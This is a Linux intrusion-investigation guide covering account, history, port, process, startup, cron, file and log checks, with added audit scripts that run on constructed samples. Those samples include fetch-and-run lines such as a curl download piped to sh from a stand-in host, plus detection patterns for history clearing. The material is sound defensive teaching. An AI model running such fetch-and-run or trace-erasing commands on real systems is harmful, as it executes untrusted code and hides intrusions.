Linux intrusion troubleshooting

1.1 Account security

Basic usage:

1. User information file /etc/passwd
   username:password:UID:GID:description:home directory:login shell
   Note: an account with no password can only log in locally; remote login is not allowed.

2. Shadow file /etc/shadow
   username:encrypted password:date of last password change:minimum days between password changes:maximum password age:days of warning before the password expires:grace days after the password expires:account expiration date:reserved
   who      list the users currently logged in (tty = local login, pts = remote login)
   w        show system status together with what each logged-in user is doing
   uptime   show how long the system has been up, the number of users and the load averages

Intrusion detection:

1. Query privileged users (UID 0):
[root@localhost ~]# awk -F: '$3==0{print $1}' /etc/passwd
2. Query accounts that can log in remotely (entries whose password field holds a hash, matched here by $1 or $6 in the hash):
[root@localhost ~]# awk '/\$1|\$6/{print $1}' /etc/shadow
3. Check whether any account other than root has sudo privileges. Unless it is needed for administration, remove sudo privileges from ordinary accounts:
[root@localhost ~]# more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"
4. Disable or delete redundant and suspicious accounts:
    usermod -L user    lock the account so it cannot log in; the second field of its /etc/shadow entry now starts with !
    userdel user       delete the user
    userdel -r user    delete the user together with its home directory under /home
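As an added example (not part of the original post), the script below runs the account checks above against constructed copies of /etc/passwd and /etc/shadow; the sample entries and hash strings are made up. It goes beyond the $1/$6 pattern used above by treating any hash that begins with $ as a usable password, which also covers $5$ (SHA-256) and $y$ (yescrypt) hashes, and it separates locked (!) accounts from accounts with an empty password field. Pass the real files (as root) to run it on a host.

```shell
#!/bin/sh
# Added example, not from the original post. Audits passwd/shadow-format files.
# The sample data below is constructed; the hash bodies are placeholders.

SAMPLE_PASSWD=$(mktemp)
SAMPLE_SHADOW=$(mktemp)
trap 'rm -f "$SAMPLE_PASSWD" "$SAMPLE_SHADOW"' EXIT

cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
toor:x:0:0:second uid 0 account:/root:/bin/bash
alice:x:1000:1000:alice:/home/alice:/bin/bash
bob:x:1001:1001:bob:/home/bob:/bin/bash
svc:x:1002:1002:service account:/var/svc:/sbin/nologin
EOF

cat > "$SAMPLE_SHADOW" <<'EOF'
root:$6$salt$HASHPLACEHOLDER:17700:0:99999:7:::
bin:*:17700:0:99999:7:::
toor:$1$salt$HASHPLACEHOLDER:17700:0:99999:7:::
alice:$y$j9T$HASHPLACEHOLDER:17700:0:99999:7:::
bob:!$6$salt$HASHPLACEHOLDER:17700:0:99999:7:::
svc::17700:0:99999:7:::
EOF

# Accounts with UID 0: anything besides root needs an explanation.
uid0_accounts() { awk -F: '$3 == 0 { print $1 }' "$1"; }

# Accounts whose shadow entry holds a usable hash ($1$, $5$, $6$, $y$, ...).
# Locked (!...) and disabled (*) entries are excluded.
password_accounts() { awk -F: 'substr($2, 1, 1) == "$" { print $1 }' "$1"; }

# Accounts locked with usermod -L / passwd -l: the hash is prefixed with !.
locked_accounts() { awk -F: 'substr($2, 1, 1) == "!" { print $1 }' "$1"; }

# Empty password field: no password is asked for on local login.
empty_password_accounts() { awk -F: '$2 == "" { print $1 }' "$1"; }

# Join both files: accounts with a usable password AND a real login shell.
# Arguments: PASSWD_FILE SHADOW_FILE (awk reads the shadow file first).
login_capable_accounts() {
    awk -F: 'NR == FNR { if (substr($2, 1, 1) == "$") ok[$1] = 1; next }
             ($1 in ok) && $7 !~ /(nologin|false)$/ { print $1 }' "$2" "$1"
}

report() {
    echo "UID 0 accounts:";            uid0_accounts "$1"
    echo "Accounts with a password:";  password_accounts "$2"
    echo "Locked accounts:";           locked_accounts "$2"
    echo "Empty-password accounts:";   empty_password_accounts "$2"
    echo "Password + login shell:";    login_capable_accounts "$1" "$2"
}

report "$SAMPLE_PASSWD" "$SAMPLE_SHADOW"
```

On a live host the same functions take /etc/passwd and /etc/shadow; the last check is the one to read first, since it lists exactly the accounts that can authenticate with a password and get a shell.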

1.2 Command history

Basic usage:

The .bash_history file records the commands an account has executed.

1. The root user's command history.
2. Open .bash_history in each account's directory under /home to see the commands ordinary accounts have executed.
To record the login IP address, execution time and similar details with each history entry:
1) Keep 10000 commands:
sed -i 's/^HISTSIZE=1000/HISTSIZE=10000/g' /etc/profile
2) Append the following configuration at the end of /etc/profile:
######jiagu history xianshi#########
USER_IP=`who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g'`
if [ "$USER_IP" = "" ]
then
    # local login: there is no remote IP, so record the host name instead
    USER_IP=`hostname`
fi
export HISTTIMEFORMAT="%F %T $USER_IP `whoami` "
shopt -s histappend
export PROMPT_COMMAND="history -a"
######### jiagu history xianshi ##########
3) Run source /etc/profile to make the configuration take effect.
 Resulting history format: 1 2018-07-10 19:45:39 root source /etc/profile
3. Clearing the history: history -c
 This command does not clear the records saved in the file, so the records in .bash_profile must be deleted by hand.

Intrusion detection:

Enter the user's home directory and export the history:
cat .bash_history >> history.txt
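Added example, not from the original post: once HISTTIMEFORMAT is in place, bash writes each command to .bash_history preceded by a comment line holding the epoch time (for example #1531223139). The script below pairs each command with its timestamp and flags the entries an investigator reads first: the history being cleared or its file removed, and files fetched into or made executable under /tmp. The history file is constructed for the example; the URL and paths in it are made up.

```shell
#!/bin/sh
# Added example, not from the original post. Reads a .bash_history written
# with HISTTIMEFORMAT set, where each command is preceded by "#<epoch>".

SAMPLE_HISTORY=$(mktemp)
trap 'rm -f "$SAMPLE_HISTORY"' EXIT
# Constructed history (the URL and paths are made up).
cat > "$SAMPLE_HISTORY" <<'EOF'
#1531223139
source /etc/profile
#1531223201
ls -la /var/www/html
#1531223260
wget http://example.invalid/x.sh -O /tmp/.x.sh
#1531223262
chmod +x /tmp/.x.sh
#1531223300
history -c
EOF

# Print "EPOCH<TAB>COMMAND" for every command. Commands recorded before the
# timestamp format was enabled have no "#<epoch>" line and get "-" instead.
annotate_history() {
    awk '/^#[0-9]+$/ { ts = substr($0, 2); next }
         { print (ts == "" ? "-" : ts) "\t" $0; ts = "" }' "$1"
}

# Entries worth reading first: history being cleared or the history file
# removed, and files fetched into or made executable under /tmp.
flag_history() {
    annotate_history "$1" | grep -E 'history -c|rm .*bash_history|(wget|curl) .*/tmp/|chmod .*\+x .*/tmp/'
}

count_flagged() { flag_history "$1" | wc -l | tr -d ' '; }

flag_history "$SAMPLE_HISTORY"
```

The first column is the raw epoch value; on a GNU system `date -u -d @1531223139` turns it into a readable timestamp, which is what the %F %T format in HISTTIMEFORMAT does when the history command displays it.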

1.3 Check for abnormal ports

Use netstat to list network connections and analyse suspicious ports, IPs and PIDs:

netstat -antlp | more

Then check the path of the executable behind a PID:
run ls -l /proc/$PID/exe or file /proc/$PID/exe ($PID is the PID found above)

1.4 Check for abnormal processes

Use the ps command to analyse the process:

ps aux | grep pid
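Added example (not the post's own code) that turns the steps in 1.3 and 1.4 into a script: it parses netstat -antlp output for LISTEN sockets and the PIDs behind every connection, then inspects each PID through /proc (exe, cwd and cmdline), flagging binaries that were deleted after starting or that run from a scratch directory. The netstat output below is a constructed sample, so the PIDs in it will not exist on your machine; inspect_pid reports that instead of failing. Linux /proc is assumed.

```shell
#!/bin/sh
# Added example, not from the original post. Linux /proc assumed for inspect_pid.

SAMPLE_NETSTAT=$(mktemp)
trap 'rm -f "$SAMPLE_NETSTAT"' EXIT
# Constructed `netstat -antlp` output (addresses and PIDs are made up).
cat > "$SAMPLE_NETSTAT" <<'EOF'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1023/sshd
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      2291/.x
tcp        0      0 10.0.0.5:22             203.0.113.7:51044       ESTABLISHED 2100/sshd: root
tcp        0      0 10.0.0.5:51832          198.51.100.9:443        ESTABLISHED 2291/.x
EOF

# "PORT PID PROGRAM" for every listening socket (last ":"-field is the port,
# which also works for IPv6 addresses such as :::22).
listening_sockets() {
    awk '$6 == "LISTEN" {
            n = split($4, a, ":"); split($7, p, "/")
            print a[n], p[1], p[2]
         }' "$1"
}

# Every PID that owns a socket, without duplicates, lowest first.
socket_pids() {
    awk '$7 ~ /^[0-9]+\// { split($7, p, "/"); print p[1] }' "$1" | sort -n | uniq
}

# Resolve what a PID is really running, as in the /proc/$PID/exe check.
inspect_pid() {
    pid=$1
    if [ ! -d "/proc/$pid" ]; then
        echo "pid $pid: no such process (or /proc unavailable)"
        return 1
    fi
    exe=$(readlink "/proc/$pid/exe" 2>/dev/null || echo "?")
    cwd=$(readlink "/proc/$pid/cwd" 2>/dev/null || echo "?")
    cmd=$(tr '\0' ' ' < "/proc/$pid/cmdline" 2>/dev/null)
    printf 'pid %s exe=%s cwd=%s cmdline=%s\n' "$pid" "$exe" "$cwd" "$cmd"
    case "$exe" in
        *"(deleted)"*|/tmp/*|/dev/shm/*|/var/tmp/*)
            echo "  WARNING: binary deleted after start or running from a scratch directory" ;;
    esac
}

# Listening ports first, then each PID that owns a socket.
listening_sockets "$SAMPLE_NETSTAT"
for pid in $(socket_pids "$SAMPLE_NETSTAT"); do inspect_pid "$pid" || true; done
```

On a live host replace the sample file with the real output (`netstat -antlp > /tmp/netstat.txt` as root); `ps aux | grep PID` then confirms the parent and start time of anything inspect_pid warns about.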

1.5 Check startup items

Basic usage:

System run levels:

Run level   Meaning
0           Shut down
1           Single-user mode, comparable to Windows safe mode; mainly used for system repair
2           Incomplete command-line mode without the NFS service
3           Full command-line mode, the standard character interface
4           Reserved by the system
5           Graphical mode

View the current run level: runlevel

System default run level:

vi /etc/inittab
id:3:initdefault:  # the run level the system enters directly after boot

Boot configuration files

Example: to start our own script at boot, place the executable script in the /etc/init.d directory and then create a symbolic link to it under /etc/rc.d/rc*.d.

Note: the * here stands for one of the seven run levels 0, 1, 2, 3, 4, 5 and 6.

[root@localhost ~]# ln -s /etc/init.d/sshd /etc/rc.d/rc3.d/S100ssh

Here sshd is the script file of the service and S100ssh its symbolic link; a leading S means the script is started when the run level is entered, while a script whose link starts with K is run to stop the service when the run level is entered.

Intrusion detection:

Startup item file:

more /etc/rc.local
ls -l /etc/rc.d/rc3.d/
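Added example, not from the original post: a script that audits a SysV rc directory the way a reviewer of ls -l /etc/rc.d/rc3.d/ would, resolving every S* link and reporting links that dangle or point outside init.d. It builds a throw-away directory tree (an init.d with one sshd script, an rc3.d with three links) so it runs without touching the system; on a host, call audit_rc_dir /etc/rc.d/rc3.d /etc/init.d instead.

```shell
#!/bin/sh
# Added example, not from the original post. Audits S* links in an rc*.d directory.

BASE=$(mktemp -d)
trap 'rm -rf "$BASE"' EXIT

# Constructed tree: a legitimate service script, a dangling link and a link
# that points at a script outside init.d (here a scratch directory).
mkdir -p "$BASE/init.d" "$BASE/rc3.d" "$BASE/scratch"
printf '#!/bin/sh\necho sshd\n' > "$BASE/init.d/sshd";    chmod +x "$BASE/init.d/sshd"
printf '#!/bin/sh\necho hello\n' > "$BASE/scratch/.x.sh"; chmod +x "$BASE/scratch/.x.sh"
ln -s ../init.d/sshd "$BASE/rc3.d/S100ssh"
ln -s ../init.d/missing "$BASE/rc3.d/S50gone"
ln -s "$BASE/scratch/.x.sh" "$BASE/rc3.d/S99evil"

# Print the canonical path a symlink points at (relative targets are taken
# relative to the link's own directory, as the kernel does).
resolve_target() {
    target=$(readlink "$1") || return 1
    case "$target" in /*) ;; *) target="$(dirname "$1")/$target" ;; esac
    dir=$(cd "$(dirname "$target")" 2>/dev/null && pwd -P) || { echo "$target"; return 0; }
    echo "$dir/$(basename "$target")"
}

# One line per S* entry: NAME STATUS TARGET
audit_rc_dir() {   # RC_DIR INIT_DIR
    rcdir=$1
    initdir=$(cd "$2" && pwd -P)
    for link in "$rcdir"/S*; do
        [ -e "$link" ] || [ -L "$link" ] || continue   # no S* entries at all
        name=$(basename "$link")
        if [ ! -L "$link" ]; then
            echo "$name WARN not-a-symlink"; continue
        fi
        target=$(resolve_target "$link")
        if [ ! -e "$link" ]; then
            echo "$name WARN dangling $target"
        elif [ "$(dirname "$target")" != "$initdir" ]; then
            echo "$name WARN outside-init.d $target"
        else
            echo "$name ok $target"
        fi
    done
}

audit_rc_dir "$BASE/rc3.d" "$BASE/init.d"
```

A link that resolves to somewhere other than init.d, or a plain file dropped into rc3.d instead of a link, is the pattern to follow up, together with anything appended to /etc/rc.local.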

1.6 Check scheduled tasks

Basic usage:

1. Creating scheduled tasks with crontab

  • Basic commands

    crontab -l   list the cron jobs of the current user
    Tip: crontab files are saved by default under /var/spool/cron/<username>, e.g. /var/spool/cron/root
    crontab -r   delete the user's cron jobs (caution: this removes all of the user's scheduled tasks)
    crontab -e   edit the current user's crontab file in an editor
    For example: */1 * * * * echo "hello world" >> /tmp/test.txt   appends to the file every minute

2. Asynchronous scheduled task scheduling with anacron

  • Use case

    Run the script under /home/ every day:
    vi /etc/anacrontab
    @daily    10    example.daily   /bin/bash /home/
     If the machine happens to be shut down when the job is due, anacron runs it ten minutes after the machine next starts up instead of waiting another seven days.

Intrusion detection

Check the following directories for malicious scripts:

more /etc/cron.daily/*  view all files in the directory
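Added example, not part of the original post: a scanner for crontab-format files that skips comments and reports the entries an investigator examines first. The indicators are the ones this section already touches on: a download piped straight into a shell, a job that runs something from /tmp or /dev/shm, and a job scheduled every minute (the */1 * * * * form shown above). The sample crontab is constructed; CRON_LOCATIONS lists where crontab(1), cron.d and anacron keep their files on a typical RHEL/CentOS host, which is an assumption about the layout.

```shell
#!/bin/sh
# Added example, not from the original post. Scans crontab files for entries
# that deserve a closer look during an intrusion investigation.

# Standard cron locations on a RHEL/CentOS-style host (assumed layout).
CRON_LOCATIONS="/etc/crontab /etc/anacrontab /var/spool/cron/* /etc/cron.d/* \
/etc/cron.hourly/* /etc/cron.daily/* /etc/cron.weekly/* /etc/cron.monthly/*"

SAMPLE_CRON=$(mktemp)
trap 'rm -f "$SAMPLE_CRON"' EXIT
# Constructed sample of /var/spool/cron/root (the URL and paths are made up).
cat > "$SAMPLE_CRON" <<'EOF'
# nightly backup
0 2 * * * /usr/local/bin/backup.sh
*/1 * * * * echo "hello world" >> /tmp/test.txt
* * * * * curl -s http://example.invalid/a.sh | sh
30 4 * * * /tmp/.x/update
EOF

# Print "FILE:LINE: REASON(S); ENTRY" for each suspicious job in one file.
# Comment and blank lines are skipped; several reasons can apply to one job.
scan_cron_file() {
    awk -v f="$1" '
        /^[ \t]*#/ { next }
        /^[ \t]*$/ { next }
        {
            reason = ""
            if ($0 ~ /(curl|wget)[^|]*\|[ \t]*(ba)?sh/) reason = reason "download piped to shell; "
            if ($0 ~ /\/tmp\/|\/dev\/shm\//)            reason = reason "runs from scratch dir; "
            if ($1 == "*" || $1 == "*/1")               reason = reason "every minute; "
            if (reason != "") printf "%s:%d: %s%s\n", f, NR, reason, $0
        }' "$1"
}

# Scan every readable regular file among the given paths (globs expand here).
scan_cron_paths() {
    for p in "$@"; do
        [ -f "$p" ] && [ -r "$p" ] && scan_cron_file "$p"
    done
    return 0
}

scan_cron_file "$SAMPLE_CRON"
# On a live host, as root:  scan_cron_paths $CRON_LOCATIONS
```

Note that the post's own crontab example (the every-minute write to /tmp/test.txt) is flagged on two counts; that is the intended behaviour, since a reviewer wants to see every job touching /tmp and decide for themselves.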

1.7 Check services

Service self-start

First method:

chkconfig [--level run-level] [service name] [on|off]
chkconfig --level 2345 httpd on   enable self-start at run levels 2, 3, 4 and 5
chkconfig httpd on                (the default levels are 2345)

Second method:

Edit the /etc/rc.d/rc.local file
and add the line /etc/init.d/httpd start

Third method:

Use the ntsysv command to manage self-starting services; it handles both stand-alone services and xinetd services.

Intrusion detection

1. Query installed services:

Services installed from RPM packages

chkconfig --list   view the self-start status of every service installed from an RPM package
ps aux | grep crond   check whether a service (here crond) is currently running

Startup items at run levels 3 and 5
Chinese locale:
chkconfig --list | grep "3:启用\|5:启用"
English locale:
chkconfig --list | grep "3:on\|5:on"

Services installed from source packages

Check the installation location, usually under /usr/local/
service httpd start
 check /etc/rc.d/init.d/ to see whether a start script exists

1.8 Check for abnormal files

1. Look at sensitive directories such as /tmp, and pay attention to hidden folders: a folder named "..." is hidden.

2. Get the creation time of the webshell or remote-control trojan. How do you find the files created in the same time range?

You can use the find command, for example find /opt -name "*" -atime 1 -type f to find the files under /opt that were accessed within a day.

3. For a suspicious file, use stat to check its creation and modification times.
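Added example, not from the original post: given one known artefact (the webshell), find every file in a directory tree whose modification time falls within a window around it, which is the "same time range" search the text describes. It uses GNU find, stat and touch (two reference files with -newer, stat -c %Y, touch -d @EPOCH), an assumption about the host. The web root and its files are constructed here, including a hidden directory named ... with a dropped file in it, the kind of name the text warns about.

```shell
#!/bin/sh
# Added example, not from the original post. GNU coreutils/findutils assumed.

WEBROOT=$(mktemp -d)
trap 'rm -rf "$WEBROOT"' EXIT

# Constructed web root. touch -t sets modification times (YYYYMMDDhhmm.SS):
# .x.php plays the webshell, config.php was touched shortly before it and a
# hidden "..." directory holds a file dropped just after it.
mkdir -p "$WEBROOT/..."
touch -t 201807091000.00 "$WEBROOT/old.log"
touch -t 201807101000.00 "$WEBROOT/index.php"
touch -t 201807101159.30 "$WEBROOT/config.php"
touch -t 201807101200.00 "$WEBROOT/.x.php"
touch -t 201807101201.00 "$WEBROOT/.../dropper"

# Files under DIR modified within WINDOW seconds of REF's mtime.
# find -newer is a strict "later than", so the lower bound is exclusive and
# the upper bound (! -newer) inclusive.
files_modified_near() {   # REF DIR WINDOW_SECONDS
    ref_ts=$(stat -c %Y "$1")
    lo=$(mktemp); hi=$(mktemp)
    touch -d "@$((ref_ts - $3))" "$lo"
    touch -d "@$((ref_ts + $3))" "$hi"
    find "$2" -type f -newer "$lo" ! -newer "$hi" -print | LC_ALL=C sort
    rm -f "$lo" "$hi"
}

# Directories whose name starts with a dot, which ls without -a never shows.
hidden_dirs() { find "$1" -type d -name '.*' | LC_ALL=C sort; }

# Everything modified within five minutes of the webshell, then hidden dirs.
files_modified_near "$WEBROOT/.x.php" "$WEBROOT" 300
hidden_dirs "$WEBROOT"
```

stat on the webshell gives the reference time; a five-minute window around it picks up config.php and the dropped file but not index.php, while old.log from the day before never appears. Widen the window in steps rather than starting large, so the first result set stays readable.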

1.9 Check the system logs

Default log location: /var/log/

Check the log configuration: more /etc/rsyslog.conf

Log file            Description
/var/log/cron       logs related to system scheduled tasks
/var/log/cups       log of printing information
/var/log/dmesg      kernel messages from the self-test at boot; the dmesg command shows the same information directly
/var/log/maillog    mail log
/var/log/messages   the general system log, which records most important events on a Linux system; when something is wrong with the system this is the first file to check
/var/log/btmp       log of failed logins; a binary file that cannot be read with vi, use the lastb command instead
/var/log/lastlog    the last login time of every user on the system; a binary file, use the lastlog command instead of vi
/var/log/wtmp       permanent record of all user logins and logouts plus system boots, reboots and shutdowns; also binary, view it with the last command
/var/log/utmp       information about the users currently logged in; it changes as users log in and out and holds only current sessions; also binary, query it with w, who, users and similar commands
/var/log/secure     authentication and authorisation records; any program that handles accounts and passwords logs here, e.g. SSH logins, su, sudo, and even adding users or changing passwords

Log analysis tips:

1. Find which IPs are brute-forcing the root account:
grep "Failed password for root" /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more

Find which IPs are brute-forcing at all:
grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|sort|uniq -c

Which user names were in the dictionary?
grep "Failed password" /var/log/secure| awk '{print $9}' | sort -nr | uniq -c
2. Which IPs logged in successfully:
grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more

Date, user name and IP of each successful login:
grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'

3. Log entries for adding the user kali:
# grep "useradd" /var/log/secure
Jul 10 00:12:15 localhost useradd[2382]: new group: name=kali, GID=1001
Jul 10 00:12:15 localhost useradd[2382]: new user: name=kali, UID=1001, GID=1001, home=/home/kali, shell=/bin/bash
Jul 10 00:12:58 localhost passwd: pam_unix(passwd:chauthtok): password changed for kali

4. Log entries for deleting the user kali:
# grep "userdel" /var/log/secure
Jul 10 00:14:17 localhost userdel[2393]: delete user 'kali'
Jul 10 00:14:17 localhost userdel[2393]: removed group 'kali' owned by 'kali'
Jul 10 00:14:17 localhost userdel[2393]: removed shadow group 'kali' owned by 'kali'

5. su user switch:
Jul 10 00:38:13 localhost su: pam_unix(su-l:session): session opened for user good by root(uid=0)

sudo authorised execution:
sudo -l
Jul 10 00:43:09 localhost sudo:    good : TTY=pts/4 ; PWD=/home/good ; USER=root ; COMMAND=/sbin/shutdown -r now
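Added example, not from the original post: the log analysis above as shell functions run over a constructed /var/log/secure excerpt (hosts, IPs and PIDs are made up). Instead of picking fixed awk columns ($9, $11), the functions extract the user and IP with a pattern, so lines of the form "Failed password for invalid user NAME from IP" are handled as well as the plain "for root from IP" form, which shifts the columns the one-liners above rely on. On Debian-based systems the same messages live in /var/log/auth.log.

```shell
#!/bin/sh
# Added example, not from the original post. Summarises sshd and account
# events from a /var/log/secure-style file. The sample log is constructed.

SECURE_LOG=$(mktemp)
trap 'rm -f "$SECURE_LOG"' EXIT
cat > "$SECURE_LOG" <<'EOF'
Jul 10 00:01:02 localhost sshd[2001]: Failed password for root from 203.0.113.7 port 51020 ssh2
Jul 10 00:01:05 localhost sshd[2001]: Failed password for root from 203.0.113.7 port 51021 ssh2
Jul 10 00:01:09 localhost sshd[2003]: Failed password for invalid user admin from 198.51.100.9 port 40011 ssh2
Jul 10 00:01:12 localhost sshd[2004]: Failed password for root from 198.51.100.9 port 40012 ssh2
Jul 10 00:02:30 localhost sshd[2010]: Accepted password for root from 203.0.113.7 port 51030 ssh2
Jul 10 00:05:00 localhost sshd[2020]: Accepted publickey for alice from 10.0.0.8 port 33000 ssh2
Jul 10 00:12:15 localhost useradd[2382]: new user: name=kali, UID=1001, GID=1001, home=/home/kali, shell=/bin/bash
Jul 10 00:12:58 localhost passwd: pam_unix(passwd:chauthtok): password changed for kali
Jul 10 00:14:17 localhost userdel[2393]: delete user 'kali'
Jul 10 00:38:13 localhost su: pam_unix(su-l:session): session opened for user kali by root(uid=0)
EOF

# "USER IP" for every failed password, whether or not the user exists.
failed_logins() {
    sed -n 's/.*Failed password for \(invalid user \)\{0,1\}\([^ ]*\) from \([0-9.]*\) .*/\2 \3/p' "$1"
}

# Which IPs are brute-forcing root, most attempts first: "COUNT IP".
failed_root_by_ip() {
    failed_logins "$1" | awk '$1 == "root" { print $2 }' | sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# Which IPs failed at all, and how many times: "COUNT IP".
failed_by_ip() {
    failed_logins "$1" | awk '{ print $2 }' | sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# The user name dictionary the attacker worked through.
usernames_tried() { failed_logins "$1" | awk '{ print $1 }' | sort -u; }

# "DATE TIME USER IP METHOD" for each successful login.
accepted_logins() {
    sed -n 's/^\([A-Z][a-z][a-z] *[0-9]* [0-9:]*\) .*Accepted \([^ ]*\) for \([^ ]*\) from \([^ ]*\) .*/\1 \3 \4 \2/p' "$1"
}

# Account lifecycle and privilege events: useradd, userdel, passwd, su, sudo.
account_events() { grep -E 'useradd\[|userdel\[|passwd: | su: | sudo: ' "$1"; }

for f in failed_root_by_ip failed_by_ip usernames_tried accepted_logins account_events; do
    echo "== $f"; "$f" "$SECURE_LOG"
done
```

Cross-check the two views: an IP that appears high in failed_root_by_ip and then shows up in accepted_logins is the brute-force that succeeded, and the account_events that follow its login time are what it did with the access.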

Tags: Cyber Security

Posted on Mon, 18 Apr 2022 21:16:47 +0930